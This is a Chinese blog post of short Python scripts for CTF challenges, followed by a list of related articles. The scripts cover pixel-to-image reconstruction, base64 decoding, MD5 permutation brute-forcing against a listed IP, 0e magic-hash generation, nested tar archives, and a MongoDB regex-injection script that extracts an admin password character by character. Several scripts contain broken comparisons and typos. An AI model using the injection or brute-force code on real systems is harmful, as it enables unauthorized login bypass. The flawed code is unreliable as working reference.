1.利用像素点还原图片。

 from PIL import Image

 import re

 if __name__ == '__main__':

     x = 887 //将像素点个数进行分解,可以确定图片的长宽

     y = 111

     i = 0

     j = 0

     c = Image.new("RGB", (x,y))

     file_object = open('ce.txt') //ce.txt中保存着像素点的坐标

     for i in range(0,  x):

         for j in range(0,  y):

             line = file_object.next() //每次读取一个像素点

             lst = line.split(",") //lst生成一个元组

             c.putpixel((i, j), (int(lst[0]), int(lst[1]), int(lst[2])))

     c.show()

     c.save("c.png")

2.py requests方法的利用以及利用正则匹配查找文本暴力破解md5值。

 #coding : utf8

 import requests

 import re

 import hashlib

 import itertools

 s = requests.session()  //建立一个session对话

 url = "http://106.75.67.214:2050/?pass=bee7a613a8fa4f2f"

 data = {'PHPSESSID':'6h7b4caq8bo41i3m5fg2983cq5'}

 content = s.get(url=url,data=data)

 target = re.findall("sh\"\>(.*)\<",content.text)

 target = target[0]

 poc = re.findall("code\"\>(.*)\<",content.text)

 str1 = poc[0]

 a = [''.join(x) for x in itertools.permutations(str1, 9)]  //join方法是通过指定的字符串来连接序列元素从而构成新字符串,permutations用来生成无重复字符的元组

 for i in range(0,len(a)):

 final = hashlib.md5(a[i])

 if final.hexdigest() == target:

 flag = s.get(url="http://106.75.67.214:2050/?code="+a[i])

 print flag.content

 print flag.headers

3.利用py将base64编码的字符串还原成图片

 import os,base64

 strs='''''sdasdas==''' //已经编码的base64字符串 

 imgdata=base64.b64decode(strs)

 file=open('1.jpg','wb')

 file.write(imgdata)

 file.close()

4.生成0e哈希值:

 #coding:utf-8

 import hashlib

 import itertools

 def go():

     payload = [c for c in "qwertyuioplkjhgfdsazxcvbnm123654789"]

     i = 0

     print payload

     for j in itertools.product(payload,repeat=30): #repeat参数指定长度

         payloads = "".join(j)

         #print pow

         #i = i+ 1

         #if i == 10:

         #    break

         str1 = hashlib.md5(payloads).hexdigest + "SALT"

         str2 = hashlib.md5(str1)

         if (str2[0]=="") & (str2[1]=="e") & (str2[2:].isdigit()):

             print payloads

 go()

5.mongodb基于正则注入:

 #coding:utf-8

 import requests

 import string

 # print string.ascii_letters

 # print string.digits

 flag = "c1ctf{"

 payload = string.ascii_letters + string.digits

 url = "http://xx.x.x.x/index.php?"

 restsrt = True

 while restsrt:

     restsrt = False

     for i in payload:

         payloads = flag + i

         post_data = {"username":"admin","passwd[$regex]":flag+".*"}

         #post_data = {"username":"admin","passwd[$regex]":"^"+flag}

         r = requests.get(url = url,data = post_data,allow_redirects = False)

         if r.status_code == "":

             print payloads

             flag = flag + i

             restsrt =True

             if i == "}":

                 exit(0)

             break

6.多次压缩打包

 #coding:utf-8

 import tarfile

 for i in range(1,2):

     tfile = tarfile.open("shell0.tar.gz","w:gz") #打包压缩

     tfile.add("flag.py")

     tfile.close()

 for i in range(1,300):

     tfile = tarfile.open("shell"+str(i)+".tar.gz","w:gz")

     tfile.add("1.php")

     tfile.add("shell"+str(i-1)+".tar.gz")

     tfile.close()

7.多次解压:

 #coding:utf-8

 import tarfile

 for i in range(1,300)[::-1]:

     file = tarfile.open("shell"+str(i)+"tar.gz")

     file.extractall()

     file.close()

积累一点ctf需要掌握的常见脚本知识的更多相关文章

  1. shell常见脚本30例

    shell常见脚本30例 author:headsen chen  2017-10-19  10:12:12 本文原素材出自网上,特此申明.有些地方加入我自己的改动 常见的30例shell脚本 1.用 ...

  2. Python简单的CTF题目hash碰撞小脚本

    Python简单的CTF题目hash碰撞小脚本 import hashlib for num in range(10000,9999999999): res = hashlib.sha1(str(nu ...

  3. Oracle手边常用70则脚本知识汇总

    Oracle手边常用70则脚本知识汇总 作者:白宁超 时间:2016年3月4日13:58:36 摘要: 日常使用oracle数据库过程中,常用脚本命令莫不是用户和密码.表空间.多表联合.执行语句等常规 ...

  4. ctf密码学------密文解码python脚本(凯撒解密)

    题目来源实验吧 分析题意,说是困在栅栏中,所以将字符栅栏解密看看有什么,利用工具CTFcraktools 得到三条密文 然后说是密码是凯撒,在将四栏依次凯撒解码,寻找可能的key,这里很显然,在尝试第 ...

  5. 放一点百度来的,常见的windowserror

    0操作成功完成.1功能错误.2系统找不到指定的文件.3系统找不到指定的路径.4系统无法打开文件.5拒绝访问.6句柄无效.7存储控制块被损坏.8存储空间不足,无法处理此命令.9存储控制块地址无效.10环 ...

  6. python 常见脚本

    一登录就发现了这篇博客,非常感谢作者,有时间会静下心来一点一滴的看 https://www.cnblogs.com/ailiailan/p/10141741.html

  7. bat脚本知识总结

    1常用基本命令 1.1 @ 它的作用是让执行窗口中不显示它后面这一行的命令本身 1.2 echo 它其实是一个开关命令,就是说它只有两种状态:打开和关闭.于是就有了echo on 和echo off两 ...

  8. 积累一些不太常用的c语言知识(不断更新)

    这里积累一些日常编程用得比较少的知识,不断添加. scanf("%c%*c%c",&a,&b); 其中的*表示跳过,本来输入三个数字,结果中间那个读入后被抛弃,a和 ...

  9. linux 常见基础知识(此文章将会在整个linux学习过程中,不断添加)

    1,linux 文件类型 普通文件 目录文件 链接文件 块设备 字符设备 Socket 管道文件 - d l b c s p 2,linux 文件属性 蓝色 绿色 浅蓝色 红色 灰色 目录 可执行文件 ...

随机推荐

  1. Win10切换中英输入法问题

    用此方法解决后的效果: Win10系统只剩下"美式键盘"和"搜狗拼音"两种输入法,且默认为美式键盘. 按Ctrl+Shift切换到搜狗拼音,输入完成后,再按Ct ...

  2. [原创]NIOS小知识总结

    本文记录了在使用NIOS中遇到的一些问题和相关的原因分析及解决办法,做个总结方便以后查阅.也希望可以帮到有同样问题的攻城狮.本文长期更新,遇到了就写下. 本人使用软件版本:QuartusII 13.0 ...

  3. 未能加载文件或程序集EntityFramework, Version=6.0.0.0解决办法

    其他信息: 未能加载文件或程序集"EntityFramework, Version=6.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934 ...

  4. SQL Server 通用分页存储过程

    create proc commonPagination ), --要显示的列名,用逗号隔开 ), --要查询的表名 ), --排序的列名 ), --排序的方式,升序为asc,降序为 desc ), ...

  5. 说一说line-height

    line-height这个样式相信大家一定不会陌生,我们经常用它来让文本上下居中,这样做一般不出出现什么问题,但是如果对这个属性不是很熟悉的话,可能会踩到一些坑,今天亲自去试验了一下,并总结了一下li ...

  6. 深入浅出Symfony2 - 结合MongoDB开发LBS应用

    简介 随着近几年各类移动终端的迅速普及,基于地理位置的服务(LBS)和相关应用也越来越多,而支撑这些应用的最基础技术之一,就是基于地理位置信息的处理.我所在的项目也正从事相关系统的开发,我们使用的是S ...

  7. 非阻塞同步算法实战(二)-BoundlessCyclicBarrier

    本人是本文的作者,首发于ifeve(非阻塞同步算法实战(二)-BoundlessCyclicBarrier) 前言 相比上一 篇而言,本文不需要太多的准备知识,但技巧性更强一些.因为分析.设计的过程比 ...

  8. STL学习笔记

    简介 STL(Standard Template Library),即标准模版库,涵盖了常用的数据结构和算法,并具有跨平台的特点.STL是C++标准函数库的一部分,如下图所示: STL含有容器.算法和 ...

  9. MVC 之 WebAPI 系列二

    今天,我想在此记录下 WebApi 跨域调用 1. 什么叫跨域: 跨域问题简单理解就是JavaScript同源策略的限制,其根本原因是因为浏览器对于这种请求,所给予的权限是较低的,通常只允许调用本域中 ...

  10. JWPlayer第一个例子

    <%@ page language="java" contentType="text/html; charset=utf-8" pageEncoding= ...